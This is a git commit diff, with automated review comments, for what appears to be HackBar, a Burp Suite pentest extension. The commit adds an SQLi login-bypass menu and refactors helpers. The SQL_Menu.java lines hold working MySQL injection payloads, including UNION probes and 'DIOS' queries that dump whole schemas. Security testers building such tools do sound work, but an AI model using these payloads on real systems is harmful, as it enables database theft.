
Commit b97cf16

rootroot
authored andcommitted
added sqli login bypass
1 parent 25458f8 commit b97cf16


11 files changed

+164
-67
lines changed

11 files changed

+164
-67
lines changed

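--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
 /build/
-/dist/
+/dist/
+/nbproject/private/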
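Review bot: Adding `/nbproject/private/` (next to the existing `/build/`) does not untrack files that are already committed, and this same commit still modifies build/built-jar.properties, build/classes/burp/*.class and nbproject/private/private.xml; those paths need a one-time `git rm -r --cached build/ nbproject/private/` before the ignore rules have any effect. Leaving them tracked also keeps a local absolute path and a user name in built-jar.properties and private.xml in the history, and ships compiled class files that reviewers cannot diff against the source.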

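--- a/README.md
+++ b/README.md
@@ -17,7 +17,7 @@
 - Burpsuite
 - Java
 
-### Install Plugin
+### Download
 
 Download Jar https://github.com/d3vilbug/HackBar/releases and add in burpsuite
 
@@ -35,3 +35,6 @@
 - XXE
 - RCE
 - Mini Webshells
+
+### Greet
+- An0n 3xPloiTeR https://github.com/Anon-Exploiter/ for SQLi && XSS payloads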

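--- a/build/built-jar.properties
+++ b/build/built-jar.properties
@@ -1,4 +1,4 @@
-#Wed, 05 Sep 2018 02:06:11 +0500
+#Fri, 07 Sep 2018 00:39:59 +0500
 
 
 C\:\\Users\\bugzy\\Documents\\NetBeansProjects\\Burp_Plugins\\HackBar=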

build/classes/burp/BurpExtender.class

52 Bytes
Binary file not shown.
-25.3 KB
Binary file not shown.

build/classes/burp/SQL_Menu.class

-690 Bytes
Binary file not shown.

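--- a/nbproject/private/private.xml
+++ b/nbproject/private/private.xml
@@ -3,10 +3,7 @@
 <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/>
 <open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2">
 <group>
-<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/SQL_Menu.java</file>
-<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/BurpExtender.java</file>
-<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/RCE_Menu.java</file>
-<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/WebShell_Menu.java</file>
+<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQL_Menu.java</file>
 </group>
 </open-files>
 </project-private>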

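--- a/src/burp/BurpExtender.java
+++ b/src/burp/BurpExtender.java
@@ -37,6 +37,7 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
 this.menu_list = new ArrayList();
 this.Hack_Bar_Menu = new JMenu(this.MenuName);
 this.Hack_Bar_Menu.add(new SQL_Menu(this));
+this.Hack_Bar_Menu.add(new SQli_LoginBypass(this));
 this.Hack_Bar_Menu.add(new XSS_Menu(this));
 this.Hack_Bar_Menu.add(new LFI_Menu(this));
 this.Hack_Bar_Menu.add(new XXE_Menu(this));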
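Review bot: The new entry is registered as `SQli_LoginBypass`, which breaks the `<Topic>_Menu` naming that the sibling entries on the surrounding lines follow (`SQL_Menu`, `XSS_Menu`, `LFI_Menu`, `XXE_Menu`) and mixes case inside the acronym; a name such as `SQLi_LoginBypass_Menu` would keep the list uniform. The class itself is not among the files visible in this commit view, so it is assumed here that its constructor takes the extender like the others. registerExtenderCallbacks starts and ends outside the hunk.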

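--- /dev/null
+++ b/src/burp/Methods.java
@@ -0,0 +1,60 @@
+/*
+ * To change this license header, choose License Headers in Project Properties.
+ * To change this template file, choose Tools | Templates
+ * and open the template in the editor.
+ */
+package burp;
+
+import java.awt.event.ActionListener;
+import javax.swing.JMenu;
+import javax.swing.JMenuItem;
+import javax.swing.JOptionPane;
+import javax.swing.JSeparator;
+
+/**
+ *
+ * @author abdul.wahab
+ */
+public class Methods {
+
+public static JMenu add_MenuItem_and_listener(JMenu menu, String[] itemList, Object actionListener){
+for(int i = 0; i < itemList.length; i++){
+JMenuItem item = new JMenuItem(itemList[i]);
+item.addActionListener((ActionListener) actionListener);
+menu.add(item);
+}
+return menu;
+}
+
+public static JMenu Create_Main_Menu(JMenu MainMenu, String[] MainMenuItems, String[][] SubMenuItems, Object actionListener){
+for(int i=0; i < MainMenuItems.length; i++){
+JMenu menu = new JMenu(MainMenuItems[i]);
+menu = add_MenuItem_and_listener(menu, SubMenuItems[i], actionListener);
+if(MainMenuItems[i].equals("Basic Statements")){
+MainMenu.add(new JSeparator());
+MainMenu.add(menu);
+MainMenu.add(new JSeparator());
+}else{
+MainMenu.add(menu);
+}
+}
+return MainMenu;
+}
+
+public static String prompt_and_validate_input(String prompt, String str){
+String user_input = JOptionPane.showInputDialog(prompt, str);
+while(user_input.trim().equals("")){
+user_input = JOptionPane.showInputDialog(prompt, str);
+}
+return user_input.trim();
+}
+
+public static byte[] do_modify_request(byte[] request, int[] selectedIndex, String modifiedString){
+byte[] modString = modifiedString.getBytes();
+byte[] newRequest = new byte[request.length + modifiedString.length() - (selectedIndex[1]-selectedIndex[0])];
+System.arraycopy(request, 0, newRequest, 0, selectedIndex[0]);
+System.arraycopy(modString, 0, newRequest, selectedIndex[0], modString.length);
+System.arraycopy(request, selectedIndex[1], newRequest, selectedIndex[0]+modString.length, request.length-selectedIndex[1]);
+return newRequest;
+}
+}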
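Review bot: `do_modify_request` sizes `newRequest` from `modifiedString.length()` (UTF-16 code units) but copies `modString.length` bytes produced by the platform-default `getBytes()`, so any replacement containing a non-ASCII character makes the third `System.arraycopy` throw `ArrayIndexOutOfBoundsException`; size the buffer from the byte array and make the charset explicit, e.g. `byte[] modString = modifiedString.getBytes(StandardCharsets.UTF_8);` and `byte[] newRequest = new byte[request.length + modString.length - (selectedIndex[1] - selectedIndex[0])];` (with `import java.nio.charset.StandardCharsets;`). The method also trusts `selectedIndex` blindly; a guard such as `if (selectedIndex[0] < 0 || selectedIndex[1] < selectedIndex[0] || selectedIndex[1] > request.length) throw new IllegalArgumentException("selection out of range");` turns a malformed selection into a clear error instead of an arraycopy failure. Separately, `prompt_and_validate_input` dereferences the result of `JOptionPane.showInputDialog` without a null check, so pressing Cancel throws a `NullPointerException` from `user_input.trim()`; the loop condition should be `while (user_input != null && user_input.trim().isEmpty())` with a null return documented as "user cancelled" for callers to handle. Finally, `actionListener` on `add_MenuItem_and_listener` and `Create_Main_Menu` is only ever cast to `ActionListener`, so declare the parameter as `ActionListener` and drop the cast, and give this utility class a private constructor since it holds only static methods.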

src/burp/SQL_Menu.java

Lines changed: 23 additions & 60 deletions
@@ -46,35 +46,15 @@ public class SQL_Menu extends JMenu{
4646
this.Create_SQL_Menu();
4747
}
4848

49-
public JMenu add_MenuItem_and_listener(JMenu menu, String[] itemList){
50-
for(int i = 0; i < itemList.length; i++){
51-
JMenuItem item = new JMenuItem(itemList[i]);
52-
item.addActionListener(new MenuItemListener(myburp));
53-
menu.add(item);
54-
}
55-
return menu;
56-
}
57-
5849
public void Create_SQL_Menu(){
59-
for(int i=0; i < SQL_MenuItem.length; i++){
60-
JMenu menu = new JMenu(SQL_MenuItem[i]);
61-
menu = add_MenuItem_and_listener(menu, SQL_MenuItems[i]);
62-
if(SQL_MenuItem[i].equals("Basic Statements")){
63-
this.add(new JSeparator());
64-
this.add(menu);
65-
this.add(new JSeparator());
66-
}else{
67-
this.add(menu);
68-
}
69-
70-
}
50+
Methods.Create_Main_Menu(this, SQL_MenuItem, SQL_MenuItems, new SQLMenuItemListener(myburp));
7151
}
7252
}
7353

74-
class MenuItemListener implements ActionListener {
54+
class SQLMenuItemListener implements ActionListener {
7555

7656
BurpExtender myburp;
77-
MenuItemListener(BurpExtender burp) {
57+
SQLMenuItemListener(BurpExtender burp) {
7858
myburp = burp;
7959
}
8060

@@ -91,23 +71,6 @@ public void actionPerformed(ActionEvent e) {
9171
req.setRequest(newRequest);
9272
}
9373

94-
public byte[] do_modify_request(byte[] request, int[] selectedIndex, String modifiedString){
95-
byte[] modString = modifiedString.getBytes();
96-
byte[] newRequest = new byte[request.length + modifiedString.length() - (selectedIndex[1]-selectedIndex[0])];
97-
System.arraycopy(request, 0, newRequest, 0, selectedIndex[0]);
98-
System.arraycopy(modString, 0, newRequest, selectedIndex[0], modString.length);
99-
System.arraycopy(request, selectedIndex[1], newRequest, selectedIndex[0]+modString.length, request.length-selectedIndex[1]);
100-
return newRequest;
101-
}
102-
103-
public String prompt_and_validate_input(String prompt, String str){
104-
String user_input = JOptionPane.showInputDialog(prompt, str);
105-
while(user_input.trim().equals("")){
106-
user_input = JOptionPane.showInputDialog(prompt, str);
107-
}
108-
return user_input.trim();
109-
}
110-
11174
public String creat_number_list(int count, String str, String str2){
11275
String col = "+";
11376
String tmp = ",";
@@ -130,39 +93,39 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
13093
String tmp = null;
13194
switch(action){
13295
case "Order By":
133-
columns = prompt_and_validate_input("Enter No. of Columns", null);
96+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
13497
selectedString = "+Order+By+" + columns + "+";
13598
break;
13699
case "Group By":
137-
columns = prompt_and_validate_input("Enter No of Columns", null);
100+
columns = Methods.prompt_and_validate_input("Enter No of Columns", null);
138101
tmp = creat_number_list(Integer.valueOf(columns), null, null);
139102
selectedString = "+GROUP+BY" + tmp + "+";
140103
break;
141104
case "Procedure Analyse":
142105
selectedString = "+PROCEDURE+ANALYSE()+";
143106
break;
144107
case "Union Select":
145-
columns = prompt_and_validate_input("Enter No. of Columns", null);
108+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
146109
tmp = creat_number_list(Integer.valueOf(columns), null, null);
147110
selectedString = "+Union+Select" + tmp + "+";
148111
break;
149112
case "Union All Select (int)":
150-
columns = prompt_and_validate_input("Enter No. of Columns", null);
113+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
151114
tmp = creat_number_list(Integer.valueOf(columns), null, null);
152115
selectedString = "+Union+ALL+Select" + tmp + "+";
153116
break;
154117
case "Union All Select(null)":
155-
columns = prompt_and_validate_input("Enter No. of Columns", null);
118+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
156119
tmp = creat_number_list(Integer.valueOf(columns), "NULL", null);
157120
selectedString = "+Union+ALL+Select" + tmp + "+";
158121
break;
159122
case "(INT),(INT)":
160-
columns = prompt_and_validate_input("Enter No. of Columns", null);
123+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
161124
tmp = creat_number_list(Integer.valueOf(columns), null, "()");
162125
selectedString = "+Union(Select" + tmp + ")+";
163126
break;
164127
case "(NULL),(NULL)":
165-
columns = prompt_and_validate_input("Enter No. of Columns", null);
128+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
166129
tmp = creat_number_list(Integer.valueOf(columns), "NULL", "()");
167130
selectedString = "+Union(Select" + tmp + ")+";
168131
break;
@@ -185,42 +148,42 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
185148
selectedString = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)";
186149
break;
187150
case "Table Group Concat":
188-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
151+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
189152
database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));
190153
selectedString = "(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=" + database + ")";
191154
break;
192155
case "Table One Shot":
193156
selectedString = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)";
194157
break;
195158
case "Column Group Concat":
196-
table = prompt_and_validate_input("Enter Table Name", null);
159+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
197160
table = "0x" + String.format("%x", new BigInteger(1, table.getBytes()));
198161
selectedString = "(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=" + table + ")";
199162
break;
200163
case "Column One Shot":
201-
table = prompt_and_validate_input("Enter Table Name", null);
164+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
202165
table = "0x" + String.format("%x", new BigInteger(1, table.getBytes()));
203166
selectedString = "(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=" + table + ")AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,column_name,0x3c62723e)))))x)";
204167
break;
205168
case "Data Group Concat":
206-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
207-
table = prompt_and_validate_input("Enter Table Name", null);
208-
columns = prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
169+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
170+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
171+
columns = Methods.prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
209172
if (!database.toLowerCase().equals("database()")){ table = database+"."+table;}
210173
selectedString = "(SELECT+GROUP_CONCAT(" + columns + "+SEPARATOR+0x3c62723e)+FROM+" + table + ")";
211174
break;
212175
case "Data One Shot":
213-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
214-
table = prompt_and_validate_input("Enter Table Name", null);
215-
columns = prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
176+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
177+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
178+
columns = Methods.prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
216179
if (!database.toLowerCase().equals("database()")){ table = database+"."+table;}
217180
selectedString = "(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(" + table + ")WHERE(@x)IN(@x:=CONCAT(0x20,@x," + columns + ",0x3c62723e))))x)";
218181
break;
219182
case "DIOS by makman":
220183
selectedString = "+concat(0x3c64697620616c69676e3d226c65667422207374796c653d22666f6e742d66616d696c793a20436f6d69632053616e73204d53223e3c68313e44494f53204279206d616b6d616e3c2f68313e,user(),0x3c62723e,version(),@x:='',@y:='',@schname:='',@tbl:='',0x0a,if(benchmark((select+count(*)from+information_schema.schemata+where+schema_name!='information_schema'),@x:=concat(@x,0x0a0a,@y:='',(select+concat(0x3c68723e,repeat(0x2d,length(schema_name)),0x3c62723e,@schname:=schema_name,0x3c62723e,repeat(0x2d,length(schema_name)),if((select+count(*)from+information_schema.columns+where+table_schema=schema_name+and+@y:=concat(@y,0x0a,if(@tbl!=table_name,concat(0x3c62723e2d2d3e20,@tbl:=table_name,0x3a3a,(select+table_rows+from+information_schema.tables+where+table_schema=schema_name+and+table_name=@tbl+limit+1)),concat(0x2a,column_name)))),'',''),@y)from+information_schema.schemata+where+schema_name!='information_schema'+and+schema_name+>+@schname+order+by+schema_name+ASC+limit+1))),'',''),0x0a,@x)+as+makman+";
221184
break;
222185
case "DIOS by makman v2":
223-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
186+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
224187
if (!database.toLowerCase().equals("database()")){ database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));}
225188
selectedString = "(select(@x)from(select(@x:=0x00),(@nr:=0),(@tbl:=0x0),(select(0)from(information_schema.tables)where(table_schema=" + database + ")and(0x00)in(@x:=concat_ws(0x20,@x,lpad(@nr:=@nr%2b1,3,0x0b),0x2e20,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,(select+count(*)+from+information_schema.columns+where+table_name=@tbl),0x3c2f666f6e743e5d20207d3c2f666f6e743e,0x3c62723e))))x)";
226189
break;
@@ -249,12 +212,12 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
249212
selectedString = "(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)";
250213
break;
251214
case "DIOS by Ajkaro":
252-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
215+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
253216
if (!database.toLowerCase().equals("database()")){ database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));}
254217
selectedString = "(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=" + database + ")and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)";
255218
break;
256219
case "DIOS by AkDK":
257-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
220+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
258221
if (!database.toLowerCase().equals("database()")){ database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));}
259222
selectedString = "concat/***/(0x223e3c2f7461626c653e3c2f6469763e3c2f613e3c666f6e7420636f6c6f723d677265656e3e3c62723e3c62723e3c62723e,0x3c666f6e7420666163653d63616d62726961207374796c653d726567756c61722073697a653d3320636f6c6f723d7265643e7e7e7e7e7e3a3a3a3a3a496e6a6563746564206279416c69204b68616e3a3a3a3a3a7e7e7e7e7e3c62723e3c666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,version(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e204461746162617365203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,database(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e2055736572203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,user(),0x3c62723e3c666f6e7420636f6c6f723d7265643e205461626c657320203c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e436f6c756d6e733c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e,@:=0,%28Select+count(*)from%28information_Schema.columns)where(table_schema=" + database + ")and@:=concat/**/(@,0x3c6c693e,0x3c666f6e7420636f6c6f723d7265643e,table_name,0x3c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a2020203c666f6e7420636f6c6f723d677265656e3e,column_name,0x3c2f666f6e743e)),@,0x3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e)";
260223
break;
@@ -295,6 +258,6 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
295258
selectedString = selectedString;
296259

297260
}
298-
return do_modify_request(request, selectedIndex, selectedString);
261+
return Methods.do_modify_request(request, selectedIndex, selectedString);
299262
}
300263
}
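Review bot: `Create_SQL_Menu` now delegates to `Methods.Create_Main_Menu`, but that shared helper keeps the `"Basic Statements"` separator special case that used to live in this class, so SQL-specific layout now applies to every menu that calls the helper and is no longer visible from this file; pass the name of the item to wrap in separators as a parameter, or let each caller add its own separators, rather than hard-coding it in the generic helper. In the `do_sql_op` hunks the value returned by `Methods.prompt_and_validate_input` is still fed straight to `Integer.valueOf(columns)` on the following context line, so a non-numeric entry unwinds `actionPerformed` with an uncaught `NumberFormatException`; a small helper that re-prompts until it parses an int, or a try/catch around the parse, would make the failure explicit. `SQLMenuItemListener` remains a second package-private top-level class in SQL_Menu.java; a static nested class, or its own file, would match the one-class-per-file convention. `do_sql_op` starts and ends outside these hunks.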
